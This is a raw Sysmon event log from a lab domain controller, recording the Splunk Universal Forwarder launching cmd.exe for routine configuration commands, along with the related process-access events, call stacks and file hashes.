12:02:54.133{266CAFBE-64EE-6064-DB00-00000000AE01}70607064C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{266CAFBE-64EE-6064-DC00-00000000AE01}7080C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+146d6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+d1d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008159Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.139{266CAFBE-64EE-6064-DC00-00000000AE01}7080C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64EE-6064-DB00-00000000AE01}7060C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000008158Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.117{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64EE-6064-DB00-00000000AE01}7060C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008157Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.117{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008156Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.117{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008155Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.117{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008154Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.117{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008153Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.117{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64EE-6064-DB00-00000000AE01}7060C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008152Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.117{266CAFBE-64EE-6064-DA00-00000000AE01}53447052C:\Windows\system32\cmd.exe{266CAFBE-64EE-6064-DB00-00000000AE01}7060C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008151Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.126{266CAFBE-64EE-6064-DB00-00000000AE01}7060C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_argsC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{266CAFBE-64EE-6064-DA00-00000000AE01}5344C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000008150Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.117{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64EE-6064-DA00-00000000AE01}5344C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008149Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.117{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008148Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.117{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008147Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.117{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008146Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.117{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008145Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.117{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-64EE-6064-DA00-00000000AE01}5344C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008144Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.117{266CAFBE-64ED-6064-D500-00000000AE01}56486600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64EE-6064-DA00-00000000AE01}5344C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7d48|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008143Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.120{266CAFBE-64EE-6064-DA00-00000000AE01}5344C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_argsC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008142Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.101{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008141Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.101{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-64EE-6064-D900-00000000AE01}5308C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008140Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.101{266CAFBE-646A-6064-0A00-00000000AE01}8403012C:\Windows\system32\services.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008139Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.086{266CAFBE-64EE-6064-D700-00000000AE01}65925340C:\Windows\system32\conhost.exe{266CAFBE-64EE-6064-D800-00000000AE01}6628C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008138Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.086{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008137Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.086{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008136Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.086{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008135Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.086{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008134Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.086{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-64EE-6064-D800-00000000AE01}6628C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008133Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.086{266CAFBE-64EE-6064-D600-00000000AE01}65685492C:\Windows\system32\cmd.exe{266CAFBE-64EE-6064-D800-00000000AE01}6628C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008132Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.086{266CAFBE-64EE-6064-D800-00000000AE01}6628C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvarsC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{266CAFBE-64EE-6064-D600-00000000AE01}6568C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvars 10341000x80000000000000008131Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.070{266CAFBE-64EE-6064-D700-00000000AE01}65925340C:\Windows\system32\conhost.exe{266CAFBE-64EE-6064-D600-00000000AE01}6568C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008130Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.055{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-64EE-6064-D700-00000000AE01}6592C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008129Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 